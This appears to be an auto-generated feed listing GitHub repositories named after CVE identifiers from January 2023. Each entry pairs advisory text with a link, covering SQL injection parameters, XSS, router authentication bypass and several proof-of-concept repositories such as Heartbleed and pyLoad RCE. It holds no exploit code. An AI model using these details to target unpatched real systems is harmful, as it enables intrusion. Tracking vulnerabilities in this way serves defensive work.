**no description** : [lixiang957/CVE-2021-36630](https://github.com/lixiang957/CVE-2021-36630) create time: 2023-01-15T09:55:38Z

**CVE-2021-33959** : [lixiang957/CVE-2021-33959](https://github.com/lixiang957/CVE-2021-33959) create time: 2023-01-15T09:47:48Z

**Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock:** : [undacmic/heartbleed-proof-of-concept](https://github.com/undacmic/heartbleed-proof-of-concept) create time: 2023-01-05T20:09:38Z

**CVE-2021-33959漏洞原理与poc验证** : [lixiang957/CVE-2021-33959](https://github.com/lixiang957/CVE-2021-33959) create time: 2023-01-15T09:09:17Z

**Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in GitHub repository radareorg/radare2 prior to 5.8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0302](https://github.com/Live-Hack-CVE/CVE-2023-0302) create time: 2023-01-15T06:41:00Z

**Mercedes-Benz XENTRY Retail Data Storage 7.8.1 allows remote attackers to cause a denial of service (device restart) via an unauthenticated API request. The attacker must be on the same network as the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23590](https://github.com/Live-Hack-CVE/CVE-2023-23590) create time: 2023-01-15T06:40:53Z

**no description** : [nhamle2/CVE-2015-8660](https://github.com/nhamle2/CVE-2015-8660) create time: 2023-01-15T02:35:52Z

**A vulnerability, which was classified as critical, was found in abreen Apollo. This affects an unknown part. The manipulation of the argument file leads to path traversal. The name of the patch is 6206406630780bbd074aff34f4683fb764faba71. It is recommended to apply a patch to fix this issue. The associated identifier o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10043](https://github.com/Live-Hack-CVE/CVE-2015-10043) create time: 2023-01-15T00:08:53Z

**A vulnerability has been found in ssn2013 cis450Project and classified as critical. This vulnerability affects the function addUser of the file HeatMapServer/src/com/datformers/servlet/AddAppUser.java. The manipulation leads to sql injection. The name of the patch is 39b495011437a105c7670e17e071f99195b4922e. It is reco CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10020](https://github.com/Live-Hack-CVE/CVE-2015-10020) create time: 2023-01-15T00:08:48Z

**A vulnerability has been found in fabarea media_upload and classified as critical. This vulnerability affects the function getUploadedFileList of the file Classes/Service/UploadFileService.php. The manipulation leads to pathname traversal. Upgrading to version 0.9.0 is able to address this issue. The name of the patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15017](https://github.com/Live-Hack-CVE/CVE-2016-15017) create time: 2023-01-15T00:08:39Z

**The Royal Elementor Addons plugin for WordPress is vulnerable to insufficient access control in the 'wpr_save_mega_menu_settings' AJAX action in versions up to, and including, 1.3.59. This allows any authenticated user, including those with subscriber-level permissions, to enable and modify Mega Menu settings for any m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4711](https://github.com/Live-Hack-CVE/CVE-2022-4711) create time: 2023-01-15T00:08:44Z

**A vulnerability, which was classified as problematic, was found in Minichan. This affects an unknown part of the file reports.php. The manipulation of the argument headline leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is fc0e732e58630cba318d6bf49d1388a7aa9d390e. I CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20167](https://github.com/Live-Hack-CVE/CVE-2017-20167) create time: 2023-01-14T21:55:38Z

**Cross-site Scripting (XSS) - Stored in GitHub repository alfio-event/alf.io prior to Alf.io 2.0-M4-2301. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0301](https://github.com/Live-Hack-CVE/CVE-2023-0301) create time: 2023-01-14T19:42:30Z

**Cross-site Scripting (XSS) - Reflected in GitHub repository alfio-event/alf.io prior to 2.0-M4-2301. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0300](https://github.com/Live-Hack-CVE/CVE-2023-0300) create time: 2023-01-14T19:42:26Z

**no description** : [pwneddr/Sonic_CVE-2022-22274_poc](https://github.com/pwneddr/Sonic_CVE-2022-22274_poc) create time: 2023-01-14T17:15:53Z

**Improper Input Validation in GitHub repository publify/publify prior to 9.2.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0299](https://github.com/Live-Hack-CVE/CVE-2023-0299) create time: 2023-01-14T17:32:35Z

**Insecure Storage of Sensitive Information in GitHub repository publify/publify prior to 9.2.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2815](https://github.com/Live-Hack-CVE/CVE-2022-2815) create time: 2023-01-14T15:18:56Z

**Integer Overflow or Wraparound in GitHub repository publify/publify prior to 9.2.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1812](https://github.com/Live-Hack-CVE/CVE-2022-1812) create time: 2023-01-14T15:18:52Z

**Broken Access Control in Betheme theme <= 26.6.1 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45353](https://github.com/Live-Hack-CVE/CVE-2022-45353) create time: 2023-01-14T14:12:03Z

**Reflected Cross-Site Scripting (XSS) vulnerability in CRM Perks Forms – WordPress Form Builder <= 1.1.0 ver. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38467](https://github.com/Live-Hack-CVE/CVE-2022-38467) create time: 2023-01-14T14:11:58Z

**Improper Authorization in GitHub repository firefly-iii/firefly-iii prior to 5.8.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0298](https://github.com/Live-Hack-CVE/CVE-2023-0298) create time: 2023-01-14T11:58:23Z

**When using Apache Shiro before 1.11.0 together with Spring Boot 2.6+, a specially crafted HTTP request may cause an authentication bypass. The authentication bypass occurs when Shiro and Spring Boot are using different pattern-matching techniques. Both Shiro and Spring Boot < 2.6 default to Ant style pattern matching. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22602](https://github.com/Live-Hack-CVE/CVE-2023-22602) create time: 2023-01-14T11:58:19Z

**JPEGOPTIM v1.4.7 was discovered to contain a segmentation violation which is caused by a READ memory access at jpegoptim.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32325](https://github.com/Live-Hack-CVE/CVE-2022-32325) create time: 2023-01-14T06:31:31Z

**An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to access the profile information of all connected users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45167](https://github.com/Live-Hack-CVE/CVE-2022-45167) create time: 2023-01-14T06:31:06Z

**An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application accepts a set of user-controlled parameters that are used to act on the data returned to the user. It allows a basic user to access data unrelated to their role. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45166](https://github.com/Live-Hack-CVE/CVE-2022-45166) create time: 2023-01-14T06:31:01Z

**A denial of service vulnerability exists in the cfg_server cm_processConnDiagPktList opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router's configuration service. A specially-crafted network packet can lead to denial of service. An attacker can send a malicious packet to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38393](https://github.com/Live-Hack-CVE/CVE-2022-38393) create time: 2023-01-14T06:30:57Z

**An issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP2. The application is prone to reflected Cross-site Scripting (XSS) in several features. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38481](https://github.com/Live-Hack-CVE/CVE-2022-38481) create time: 2023-01-14T06:30:53Z

**An issue was discovered in Archibus Web Central 2022.03.01.107. A service exposed by the application allows a basic user to cancel (delete) a booking, created by someone else - even if this basic user is not a member of the booking CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45164](https://github.com/Live-Hack-CVE/CVE-2022-45164) create time: 2023-01-14T06:30:49Z

**A link-manipulation issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38482](https://github.com/Live-Hack-CVE/CVE-2022-38482) create time: 2023-01-14T06:30:45Z

**An authentication bypass vulnerability exists in the get_IFTTTTtoken.cgi functionality of Asus RT-AX82U 3.0.0.4.386_49674-ge182230. A specially-crafted HTTP request can lead to full administrative access to the device. An attacker would need to send a series of HTTP requests to exploit this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35401](https://github.com/Live-Hack-CVE/CVE-2022-35401) create time: 2023-01-14T06:30:41Z

**An information disclosure vulnerability exists in the cm_processREQ_NC opcode of Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router's configuration service. A specially-crafted network packets can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38105](https://github.com/Live-Hack-CVE/CVE-2022-38105) create time: 2023-01-14T06:30:37Z

**Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0297](https://github.com/Live-Hack-CVE/CVE-2023-0297) create time: 2023-01-14T06:31:25Z

**Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. When getting the reference preview for Deck cards the user has no access to, unauthorized user could eventually get the cached data of a user that has access. There are currently no known wo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22469](https://github.com/Live-Hack-CVE/CVE-2023-22469) create time: 2023-01-14T06:31:14Z

**KubePi is a modern Kubernetes panel. A session fixation attack allows an attacker to hijack a legitimate user session, versions 1.6.3 and below are susceptible. A patch will be released in version 1.6.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22479](https://github.com/Live-Hack-CVE/CVE-2023-22479) create time: 2023-01-14T06:31:10Z

**CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad** : [bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad](https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad) create time: 2023-01-09T11:44:09Z

**A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41721](https://github.com/Live-Hack-CVE/CVE-2022-41721) create time: 2023-01-14T02:00:14Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21793](https://github.com/Live-Hack-CVE/CVE-2023-21793) create time: 2023-01-14T02:00:10Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21792](https://github.com/Live-Hack-CVE/CVE-2023-21792) create time: 2023-01-14T02:00:05Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21791](https://github.com/Live-Hack-CVE/CVE-2023-21791) create time: 2023-01-14T01:59:59Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21786](https://github.com/Live-Hack-CVE/CVE-2023-21786) create time: 2023-01-14T01:59:51Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21784](https://github.com/Live-Hack-CVE/CVE-2023-21784) create time: 2023-01-14T01:59:47Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21783](https://github.com/Live-Hack-CVE/CVE-2023-21783) create time: 2023-01-14T01:59:43Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21790](https://github.com/Live-Hack-CVE/CVE-2023-21790) create time: 2023-01-14T01:59:39Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21789](https://github.com/Live-Hack-CVE/CVE-2023-21789) create time: 2023-01-14T01:59:35Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21788](https://github.com/Live-Hack-CVE/CVE-2023-21788) create time: 2023-01-14T01:59:31Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21787](https://github.com/Live-Hack-CVE/CVE-2023-21787) create time: 2023-01-14T01:59:26Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21785](https://github.com/Live-Hack-CVE/CVE-2023-21785) create time: 2023-01-14T01:59:22Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21781, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21782](https://github.com/Live-Hack-CVE/CVE-2023-21782) create time: 2023-01-14T01:59:18Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21781, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21780](https://github.com/Live-Hack-CVE/CVE-2023-21780) create time: 2023-01-14T01:59:14Z

**3D Builder Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21780, CVE-2023-21782, CVE-2023-21783, CVE-2023-21784, CVE-2023-21785, CVE-2023-21786, CVE-2023-21787, CVE-2023-21788, CVE-2023-21789, CVE-2023-21790, CVE-2023-21791, CVE-2023-21792, CVE-2023-21793. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21781](https://github.com/Live-Hack-CVE/CVE-2023-21781) create time: 2023-01-14T01:59:10Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in Dovgalyuk AIBattle. Affected by this vulnerability is the function registerUser of the file site/procedures.php. The manipulation of the argument postLogin leads to sql injection. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10042](https://github.com/Live-Hack-CVE/CVE-2015-10042) create time: 2023-01-13T23:48:11Z

**The ifmap service that comes bundled with Contrail has an XML External Entity (XXE) vulnerability that may allow an attacker to retrieve sensitive system files. Affected releases are Juniper Networks Contrail 2.2 prior to 2.21.4; 3.0 prior to 3.0.3.4; 3.1 prior to 3.1.4.0; 3.2 prior to 3.2.5.0. CVE-2017-10616 and CVE-2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10617](https://github.com/Live-Hack-CVE/CVE-2017-10617) create time: 2023-01-13T23:49:04Z

**The ifmap service that comes bundled with Juniper Networks Contrail releases uses hard coded credentials. Affected releases are Contrail releases 2.2 prior to 2.21.4; 3.0 prior to 3.0.3.4; 3.1 prior to 3.1.4.0; 3.2 prior to 3.2.5.0. CVE-2017-10616 and CVE-2017-10617 can be chained together and have a combined CVSSv3 sc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10616](https://github.com/Live-Hack-CVE/CVE-2017-10616) create time: 2023-01-13T23:48:59Z

**A vulnerability, which was classified as critical, has been found in GGGGGGGG ToN-MasterServer. Affected by this issue is some unknown functionality of the file public_html/irc_updater/svr_request_pub.php. The manipulation leads to sql injection. The name of the patch is 3a4c7e6d51bf95760820e3245e06c6e321a7168a. It is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20169](https://github.com/Live-Hack-CVE/CVE-2017-20169) create time: 2023-01-13T23:48:15Z

**Under some circumstances an Insufficiently Protected Credentials vulnerability in Johnson Controls Metasys ADS/ADX/OAS 10 versions prior to 10.1.6 and 11 versions prior to 11.0.3 allows API calls to expose credentials in plain text. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36204](https://github.com/Live-Hack-CVE/CVE-2021-36204) create time: 2023-01-13T23:48:20Z

**An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45299](https://github.com/Live-Hack-CVE/CVE-2022-45299) create time: 2023-01-13T23:48:30Z

**Authenticated mail users, under specific circumstances, could add files with unsanitized content in public folders where the IIS user had permission to access. That action, could lead an attacker to store arbitrary code on that files and execute RCE commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42136](https://github.com/Live-Hack-CVE/CVE-2022-42136) create time: 2023-01-13T23:48:24Z

**** DISPUTED ** Zimbra Collaboration Open Source 8.8.15 does not encrypt the initial-login randomly created password (from the "zmprove ca" command). It is visible in cleartext on port UDP 514 (aka the syslog port). NOTE: a third party reports that this cannot be reproduced. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32294](https://github.com/Live-Hack-CVE/CVE-2022-32294) create time: 2023-01-13T23:48:07Z

**Hospital Management System v1.0 is vulnerable to SQL Injection. Attackers can gain administrator privileges without the need for a password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46093](https://github.com/Live-Hack-CVE/CVE-2022-46093) create time: 2023-01-13T23:48:01Z

**Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21599](https://github.com/Live-Hack-CVE/CVE-2023-21599) create time: 2023-01-13T23:48:54Z

**Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21598](https://github.com/Live-Hack-CVE/CVE-2023-21598) create time: 2023-01-13T23:48:50Z

**Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21597](https://github.com/Live-Hack-CVE/CVE-2023-21597) create time: 2023-01-13T23:48:47Z

**Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21596](https://github.com/Live-Hack-CVE/CVE-2023-21596) create time: 2023-01-13T23:48:43Z

**Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21595](https://github.com/Live-Hack-CVE/CVE-2023-21595) create time: 2023-01-13T23:48:39Z

**Adobe InCopy versions 18.0 (and earlier), 17.4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21594](https://github.com/Live-Hack-CVE/CVE-2023-21594) create time: 2023-01-13T23:48:34Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in Dovgalyuk AIBattle. Affected is the function sendComments of the file site/procedures.php. The manipulation of the argument text leads to sql injection. The name of the patch is e3aa4d0900167641d41cb CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10041](https://github.com/Live-Hack-CVE/CVE-2015-10041) create time: 2023-01-13T21:36:57Z

**A vulnerability was found in gitlearn. It has been declared as problematic. This vulnerability affects the function getGrade/getOutOf of the file scripts/config.sh of the component Escape Sequence Handler. The manipulation leads to injection. The attack can be initiated remotely. The name of the patch is 3faa5deaa50901 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10040](https://github.com/Live-Hack-CVE/CVE-2015-10040) create time: 2023-01-13T21:36:53Z

**Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/manage_user.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46956](https://github.com/Live-Hack-CVE/CVE-2022-46956) create time: 2023-01-13T21:37:38Z

**Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_queue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46955](https://github.com/Live-Hack-CVE/CVE-2022-46955) create time: 2023-01-13T21:37:34Z

**Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_transaction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46954](https://github.com/Live-Hack-CVE/CVE-2022-46954) create time: 2023-01-13T21:37:30Z

**Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_window. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46953](https://github.com/Live-Hack-CVE/CVE-2022-46953) create time: 2023-01-13T21:37:26Z

**Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46952](https://github.com/Live-Hack-CVE/CVE-2022-46952) create time: 2023-01-13T21:37:22Z

**Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46951](https://github.com/Live-Hack-CVE/CVE-2022-46951) create time: 2023-01-13T21:37:19Z

**Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_window. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46950](https://github.com/Live-Hack-CVE/CVE-2022-46950) create time: 2023-01-13T21:37:14Z

**Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_helmet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46949](https://github.com/Live-Hack-CVE/CVE-2022-46949) create time: 2023-01-13T21:37:10Z

**Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46947](https://github.com/Live-Hack-CVE/CVE-2022-46947) create time: 2023-01-13T21:37:05Z

**Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_brand. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46946](https://github.com/Live-Hack-CVE/CVE-2022-46946) create time: 2023-01-13T21:37:01Z

**An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Part of the application does not implement protection against brute-force attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38491](https://github.com/Live-Hack-CVE/CVE-2022-38491) create time: 2023-01-13T21:36:48Z

**An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03 before 2022.1.110.1.02. One parameter allows SQL injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38492](https://github.com/Live-Hack-CVE/CVE-2022-38492) create time: 2023-01-13T21:36:42Z

**An issue was discovered in EasyVista 2020.2.125.3 before 2022.1.110.1.02. It is prone to stored Cross-site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38489](https://github.com/Live-Hack-CVE/CVE-2022-38489) create time: 2023-01-13T21:36:38Z

**Script to update Windows Recovery Environment to patch against CVE-2022-41099** : [halsey51013/UpdateWindowsRE-CVE-2022-41099](https://github.com/halsey51013/UpdateWindowsRE-CVE-2022-41099) create time: 2023-01-13T21:27:03Z

**Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21589](https://github.com/Live-Hack-CVE/CVE-2023-21589) create time: 2023-01-13T21:38:03Z

**Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21588](https://github.com/Live-Hack-CVE/CVE-2023-21588) create time: 2023-01-13T21:37:59Z

**Adobe InDesign version 18.0 (and earlier), 17.4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21587](https://github.com/Live-Hack-CVE/CVE-2023-21587) create time: 2023-01-13T21:37:55Z

**The Launchpad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its settings parameters in versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0295](https://github.com/Live-Hack-CVE/CVE-2023-0295) create time: 2023-01-13T21:37:51Z

**The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on its AJAX actions function. This makes it possible for unauthenticated attackers to change image categories used by the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0294](https://github.com/Live-Hack-CVE/CVE-2023-0294) create time: 2023-01-13T21:37:47Z

